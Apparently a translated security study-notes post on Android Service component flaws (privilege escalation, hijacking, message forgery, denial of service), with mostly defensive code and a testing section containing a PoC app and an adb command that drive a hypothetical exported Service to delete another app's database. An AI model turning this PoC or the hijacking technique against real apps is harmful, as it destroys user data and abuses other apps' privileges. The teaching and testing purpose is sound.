Mobile Security Study Notes: Component Security, Service Component Vulnerability Mining

0x00 Service Security Introduction

1. Vulnerability scenario

Service is one of the four major components of Android. A Service is an application component that has no user interface and can run in the background for a long time.

If an exported Service has no corresponding permission restriction, any application can start and bind to it. Depending on the functionality it exposes, this may let another application perform unauthorized actions, obtain sensitive information, or tamper with the application's internal state.

2. Vulnerability classification
  • Privilege escalation
  • Service hijacking
  • Message forgery
  • Denial of service

0x01 privilege escalation

1. Vulnerability principle

When a Service declares an intent-filter it is exported by default (for apps targeting API 30 or lower; from Android 12 the exported attribute must be set explicitly). If no permission restricts who may call the Service and the caller's identity is not verified, a maliciously constructed app can pass in suitable parameters and invoke the Service, triggering privileged behavior, for example calling a system-privileged uninstall Service to remove other applications.

2. Protection

Declare a calling permission for the Service when registering it in the manifest (android:permission), preferably a signature-level permission.
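As an added illustration (not from the original post; the package, Service and permission names are hypothetical), the manifest fragments below show a Service exposed without protection next to the same Service guarded by a signature-level permission, which is also the pattern recommended in 0x06:

```xml
<!-- Before: the intent-filter makes the Service exported by default
     (targetSdk below 31), and nothing restricts who may start or bind it. -->
<service android:name=".CleanupService">
    <intent-filter>
        <action android:name="com.example.victim.action.CLEANUP" />
    </intent-filter>
</service>

<!-- After: define a permission that only apps signed with the same key
     can hold, and require it on the Service. -->
<permission
    android:name="com.example.victim.permission.CLEANUP"
    android:protectionLevel="signature" />

<service
    android:name=".CleanupService"
    android:exported="true"
    android:permission="com.example.victim.permission.CLEANUP">
    <intent-filter>
        <action android:name="com.example.victim.action.CLEANUP" />
    </intent-filter>
</service>
```

A caller that does not hold the permission receives a SecurityException from startService or bindService. From Android 12 (API 31) a component with an intent-filter must set android:exported explicitly or the app will not install, which makes the exposure visible at review time. If no other app needs the Service at all, android:exported="false" with no intent-filter is simpler than a permission. Use a permission name that is unique to your package: since Android 5.0 the system refuses to install a second app that defines the same permission name under a different signing key.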

0x02 Service hijacking

1. Vulnerability principle
  • The method to start a Service is ComponentName startService(Intent service).
  • The Intent passed to start the Service can be built in two ways:
    • Set only an action, so the system resolves the Service by matching the action
    • Explicitly specify the Service class to start and its package name via ComponentName

When the Service is started only by action, an attacker can register a Service whose intent-filter receives the same action.

If several Services on the device declare an intent-filter for the same action, the system first compares the intent-filter priority value: the higher value is started. Among Services with the same priority, the one belonging to the application installed first takes precedence. Note that since Android 5.0 (API 21), startService and bindService throw an IllegalArgumentException for an implicit Intent when the calling app targets API 21 or higher, so this attack mainly affects apps with a lower targetSdk.

2. Detection method

Scan all calls to startService and bindService in the application, examine the Intent passed to each, and check whether the Intent meets any of the following conditions:

1. The Intent specifies the class when it is created

2. Intent uses the setClass method to specify the class

3. Intent uses the setComponent method to specify the package and class.

If the Intent meets none of the above conditions, the Service is at risk of being hijacked by an external application.

Exploitation: when the target Service is started by action, the attacker creates a Service that receives the same action with a higher priority value.

3. Protection
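The protection is the explicit Intent that 0x06 recommends. As an added example (this is not the original post's code; the package, action and class names are hypothetical), the client-side code below shows the hijackable implicit start, the explicit start, and a helper that resolves an implicit Intent and converts it into an explicit one only if it resolved to the expected package:

```java
package com.example.client;

import android.content.ComponentName;
import android.content.Context;
import android.content.Intent;
import android.content.pm.PackageManager;
import android.content.pm.ResolveInfo;

// Starting a Service implicitly (hijackable) versus explicitly.
public final class SyncStarter {

    static final String ACTION_SYNC = "com.example.provider.action.SYNC";
    static final String PROVIDER_PKG = "com.example.provider";
    static final String PROVIDER_SERVICE = "com.example.provider.SyncService";

    // VULNERABLE: only the action is set. Any app whose Service declares an
    // intent-filter for ACTION_SYNC (with a higher android:priority, or
    // installed earlier) receives this Intent together with its extras.
    // With targetSdk >= 21 this call throws IllegalArgumentException
    // ("Service Intent must be explicit"); older targetSdk levels are exposed.
    static void startSyncVulnerable(Context ctx, String authToken) {
        Intent i = new Intent(ACTION_SYNC);
        i.putExtra("token", authToken);
        ctx.startService(i);
    }

    // FIXED: name the package and class. The system delivers the Intent to
    // that component only, whatever other apps' intent-filters declare.
    static void startSyncExplicit(Context ctx, String authToken) {
        Intent i = new Intent(ACTION_SYNC);
        i.setComponent(new ComponentName(PROVIDER_PKG, PROVIDER_SERVICE));
        i.putExtra("token", authToken);
        ctx.startService(i);
    }

    // When the class name is not known in advance (a cooperating app may
    // rename its Service), restrict resolution to the expected package,
    // check where the Intent actually resolved, and only then make it explicit.
    // Returns null when the Service is absent or belongs to another package.
    static Intent makeExplicit(Context ctx, Intent implicit, String expectedPkg) {
        PackageManager pm = ctx.getPackageManager();
        implicit.setPackage(expectedPkg);            // limit candidates up front
        ResolveInfo ri = pm.resolveService(implicit, 0);
        if (ri == null || ri.serviceInfo == null
                || !expectedPkg.equals(ri.serviceInfo.packageName)) {
            return null;
        }
        Intent explicit = new Intent(implicit);
        explicit.setComponent(new ComponentName(
                ri.serviceInfo.packageName, ri.serviceInfo.name));
        return explicit;
    }
}
```

setPackage on its own already satisfies the API 21 explicitness check, but it only narrows resolution to one package; setComponent pins the exact class, which is what the detection conditions in 2 look for.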

0x03 message forgery

1. Vulnerability principle

An exposed Service receives Intents from outside. If a malicious message is constructed and delivered in the Intent, the receiving Service may act on it and create a security risk.

2. Examples of vulnerabilities

Replacing the URL of a specified upgrade download lets an attacker cause an arbitrary application to be installed.

3. Fix the code
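The following is an added example, not the original post's fix; the package, extra and host names are hypothetical. The vulnerable shape takes the download URL from the Intent; the fixed Service refuses any caller-supplied URL, accepts only a version string, validates it, and builds the URL from a fixed HTTPS origin so that neither the host nor the path can be redirected:

```java
package com.example.victim;

import android.app.IntentService;
import android.content.Intent;
import android.util.Log;
import java.util.regex.Pattern;

// Upgrade Service that used to accept a download URL from outside.
public class UpdateService extends IntentService {
    private static final String TAG = "UpdateService";
    public static final String EXTRA_URL = "url";          // legacy, untrusted
    public static final String EXTRA_VERSION = "version";  // the only accepted input
    static final String UPDATE_ORIGIN = "https://update.example.com/updates/";
    // Digits and dots only: no "../", no "@evil.com", no query string.
    static final Pattern VERSION = Pattern.compile("^[0-9]{1,4}(\\.[0-9]{1,4}){1,3}$");

    public UpdateService() {
        super("UpdateService");
    }

    // VULNERABLE (message forgery): whoever can start this exported Service
    // decides what gets downloaded and installed.
    //
    //   String url = intent.getStringExtra(EXTRA_URL);
    //   downloadAndInstall(url);

    // FIXED: the caller may only name a version. Returns null if rejected.
    static String buildUpdateUrl(String version) {
        if (version == null || !VERSION.matcher(version).matches()) {
            return null;
        }
        return UPDATE_ORIGIN + "app-" + version + ".apk";
    }

    @Override
    protected void onHandleIntent(Intent intent) {
        if (intent == null) {
            return;
        }
        if (intent.hasExtra(EXTRA_URL)) {
            Log.w(TAG, "ignoring caller-supplied URL");   // never honored
        }
        String url = buildUpdateUrl(intent.getStringExtra(EXTRA_VERSION));
        if (url == null) {
            Log.w(TAG, "rejected update request: bad version");
            return;
        }
        downloadAndInstall(url);
    }

    private void downloadAndInstall(String url) {
        // Out of scope here: fetch over HTTPS and check that the downloaded
        // APK is signed with the same certificate as this app before handing
        // it to the installer. A trusted URL alone does not make the payload
        // trustworthy if the host or the connection is compromised.
        Log.i(TAG, "would download " + url);
    }
}
```

Validating a full URL with an allowlist of hosts is the weaker alternative: different parsers disagree on inputs such as userinfo, backslashes and embedded newlines, so the check and the HTTP client may not see the same host. Building the URL from constants sidesteps that class of bypass.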

0x04 Denial of service

1. Vulnerability principle

The main cause is that the Service does not handle abnormal cases in the received Intent when it is started, so the process crashes.

2. Protection

Handle the received Intent and the information it carries carefully.

Wrap the processing of any received data in try/catch, and deal with data that does not meet expectations instead of letting the exception propagate.

Common exception handling:

  • Null pointer exception (including a null Intent after a START_STICKY restart)
  • Type conversion exception (ClassCastException on extras of an unexpected type)
  • Array index out of bounds exception
  • Class not found exception (surfaced as BadParcelableException when unparceling an unknown Parcelable or Serializable class)
  • Other exceptions
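An added example (not code from the original post; the extra names and limits are hypothetical) of a started Service whose onStartCommand survives a null Intent, missing, mistyped and malformed extras, and rejects them without taking the process down:

```java
package com.example.victim;

import android.app.Service;
import android.content.Intent;
import android.os.Bundle;
import android.os.IBinder;
import android.util.Log;

// Started Service hardened against Intent-driven crashes.
public class ReportService extends Service {
    private static final String TAG = "ReportService";

    @Override
    public IBinder onBind(Intent intent) {
        return null;    // started Service only; no binding surface
    }

    // VULNERABLE shape, for comparison:
    //   String id = intent.getStringExtra("id");              // NPE when intent is null
    //   int[] counts = intent.getIntArrayExtra("counts");
    //   int total = counts[0] + counts[1] + counts[2];        // NPE / ArrayIndexOutOfBounds
    //   int limit = Integer.parseInt(intent.getStringExtra("limit")); // NumberFormatException
    // Any of these kills the process: a one-Intent denial of service.

    @Override
    public int onStartCommand(Intent intent, int flags, int startId) {
        try {
            handle(intent);
        } catch (RuntimeException e) {
            // Everything the extras can throw on unparcel or access
            // (NullPointer, ClassCast, BadParcelable wrapping an unknown
            // class, IndexOutOfBounds, NumberFormat) is a RuntimeException.
            Log.w(TAG, "rejected malformed start request", e);
        } finally {
            stopSelf(startId);
        }
        // START_NOT_STICKY: do not restart with a null Intent after a kill,
        // the usual way intent == null reaches onStartCommand.
        return START_NOT_STICKY;
    }

    // Returns the computed total, or -1 if there was nothing to process.
    int handle(Intent intent) {
        if (intent == null) {
            return -1;                       // restart after kill, or an empty start
        }
        Bundle extras = intent.getExtras();  // first access unparcels the caller's data
        if (extras == null) {
            return -1;
        }
        String id = extras.getString("id");
        if (id == null || id.isEmpty() || id.length() > 64) {
            throw new IllegalArgumentException("bad id");
        }
        int[] counts = extras.getIntArray("counts");  // null if absent or of another type
        if (counts == null || counts.length != 3) {
            throw new IllegalArgumentException("bad counts");
        }
        int limit = Integer.parseInt(extras.getString("limit", "10"));
        if (limit < 1 || limit > 1000) {
            throw new IllegalArgumentException("bad limit");
        }
        int total = counts[0] + counts[1] + counts[2];
        Log.i(TAG, "report " + id + " total=" + total + " limit=" + limit);
        return total;
    }
}
```

Catching RuntimeException rather than individual types is deliberate: the Bundle is unparceled lazily on first access, and Android wraps ClassNotFoundException from an unknown Parcelable or Serializable class in a RuntimeException at that point. An OutOfMemoryError from an oversized payload is an Error, not an exception, and is not caught here; size limits on the transaction are the system's job, but the Service should not keep huge extras alive longer than needed.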

0x05 test method

1. Find the exported Service

A Service can only be registered statically, so exported Services can be found by inspecting AndroidManifest.xml after decompilation, or with drozer. If there is an exported Service, proceed to the next step.

2. View the service class

Focus on the onCreate / onStartCommand / onHandleIntent methods (and onBind for bound Services).

3. Retrieve all startService / bindService calls in the classes and the data they pass;
4. Write a test PoC according to the business logic, or test directly with adb commands.
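The whole procedure, as an added PoC skeleton that is not from the original post: it targets a hypothetical exported Service com.example.victim/.CleanupService that deletes the path named in its "path" extra (the privilege-escalation scenario of 0x01). The PoC app declares no permission, which is exactly what an unprotected manifest allows; all names and the path are assumptions.

```java
package com.example.poc;

import android.app.Activity;
import android.content.ComponentName;
import android.content.Intent;
import android.os.Bundle;
import android.util.Log;

// PoC: drive the victim's exported Service from a third-party app.
public class PocActivity extends Activity {
    private static final String TAG = "PoC";
    static final String VICTIM_PKG = "com.example.victim";
    static final String VICTIM_SERVICE = "com.example.victim.CleanupService";
    static final String VICTIM_ACTION = "com.example.victim.action.CLEANUP";

    // Explicit component plus the action the victim's intent-filter expects,
    // so the Intent is accepted on API 21+ and lands on the victim even if
    // other apps also declare that action.
    static Intent buildStartIntent(String path) {
        Intent i = new Intent(VICTIM_ACTION);
        i.setComponent(new ComponentName(VICTIM_PKG, VICTIM_SERVICE));
        i.putExtra("path", path);
        return i;
    }

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        Intent i = buildStartIntent("/data/data/" + VICTIM_PKG + "/databases/accounts.db");
        try {
            // If it goes through, the deletion runs in the victim's process,
            // with the victim's UID and permissions.
            ComponentName started = startService(i);
            Log.i(TAG, started != null
                    ? "started " + started.flattenToShortString()
                    : "service not found");
        } catch (SecurityException e) {
            // A Service protected by android:permission ends up here.
            Log.i(TAG, "blocked: " + e.getMessage());
        }
        finish();
    }
}
```

Start the PoC from a foreground Activity, as above, because Android 8 and later restrict startService calls from background apps. The same request from the shell is `adb shell am startservice -n com.example.victim/.CleanupService -a com.example.victim.action.CLEANUP --es path /data/data/com.example.victim/databases/accounts.db`, and `run app.service.info -a com.example.victim` in drozer lists the package's exported Services together with the permission each requires, which is step 1 of this procedure. For a bound Service the PoC instead calls bindService with a ServiceConnection and exercises the IBinder it receives.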

0x06 Security Recommendations

1. intent-filter and exported
  • Define the exported attribute explicitly
  • A private Service defines no intent-filter and sets exported to false
  • A public Service sets exported to true; an intent-filter may or may not be defined
  • An internal or cooperative Service sets exported to true and defines no intent-filter
2. Other
  • A Service used only by the application itself should be private
  • The data received by the Service must be validated
  • An internal Service should use a permission with protectionLevel="signature"
  • Whether to provide the service should not be decided when the Service is created (when onCreate is called); make the decision when onStartCommand / onBind / onHandleIntent are called
  • Avoid sending sensitive data, and when returning data, judge whether the receiving app is at risk of leaking it
  • A cooperative Service should verify the app signature of the cooperating company
  • When the Service to call is known, use an explicit Intent
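For the cooperative Service case, an added example (not from the original post): the partner app is signed with its own key, so a signature-level permission does not apply, and the Service instead pins the partner's signing certificate and checks the caller inside the Binder transaction. The package name and certificate digest are hypothetical placeholders; hasSigningCertificate requires API 28, and on older releases the equivalent is getPackageInfo with GET_SIGNATURES and a digest comparison of each Signature.

```java
package com.example.victim;

import android.app.Service;
import android.content.Intent;
import android.content.pm.PackageManager;
import android.os.Binder;
import android.os.IBinder;
import android.os.Parcel;
import android.os.RemoteException;
import android.util.Log;

// Bound Service that only serves a partner app with a pinned signing certificate.
public class PartnerService extends Service {
    private static final String TAG = "PartnerService";
    static final String PARTNER_PKG = "com.example.partner";
    // SHA-256 of the partner's DER-encoded signing certificate, pinned at
    // build time. Placeholder value; replace with the real digest.
    static final byte[] PARTNER_CERT_SHA256 = hexToBytes(
            "0000000000000000000000000000000000000000000000000000000000000000");

    static final int CODE_GET_TOKEN = IBinder.FIRST_CALL_TRANSACTION;

    private final Binder binder = new Binder() {
        @Override
        protected boolean onTransact(int code, Parcel data, Parcel reply, int flags)
                throws RemoteException {
            // Only inside a transaction is Binder.getCallingUid() the client.
            // In onBind() and onStartCommand() the caller is the system, so
            // checks there can validate the Intent but not the caller's identity.
            int uid = Binder.getCallingUid();
            if (!isTrustedPartner(uid)) {
                throw new SecurityException("uid " + uid + " is not the partner app");
            }
            if (code == CODE_GET_TOKEN) {
                reply.writeString(issueToken());
                return true;
            }
            return super.onTransact(code, data, reply, flags);
        }
    };

    @Override
    public IBinder onBind(Intent intent) {
        return binder;
    }

    // Every package sharing the calling UID must be the partner package and
    // carry the pinned certificate (current or in its rotation lineage), so a
    // stranger sharing the partner's UID is rejected too.
    boolean isTrustedPartner(int uid) {
        PackageManager pm = getPackageManager();
        String[] pkgs = pm.getPackagesForUid(uid);
        if (pkgs == null || pkgs.length == 0) {
            return false;
        }
        for (String pkg : pkgs) {
            if (!PARTNER_PKG.equals(pkg)
                    || !pm.hasSigningCertificate(pkg, PARTNER_CERT_SHA256,
                                                 PackageManager.CERT_INPUT_SHA256)) {
                Log.w(TAG, "rejecting caller package " + pkg);
                return false;
            }
        }
        return true;
    }

    private String issueToken() {
        return "token-for-partner";   // stands in for the real protected operation
    }

    static byte[] hexToBytes(String hex) {
        byte[] out = new byte[hex.length() / 2];
        for (int i = 0; i < out.length; i++) {
            out[i] = (byte) Integer.parseInt(hex.substring(2 * i, 2 * i + 2), 16);
        }
        return out;
    }
}
```

Checking the package name alone is not enough, since a package name is not bound to a key and a different developer can publish it on another device; checking the certificate alone is not enough either when the partner signs several apps. The Service is declared with android:exported="true" and no intent-filter, the internal/cooperative pattern in 1 above, and the runtime check carries the trust decision.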

0x07 References

https://tea9.xyz/post/962818054.html
https://github.com/WooyunDota/DroidDrops/tree/master/2014


Source: blog.csdn.net/syy0201/article/details/114155570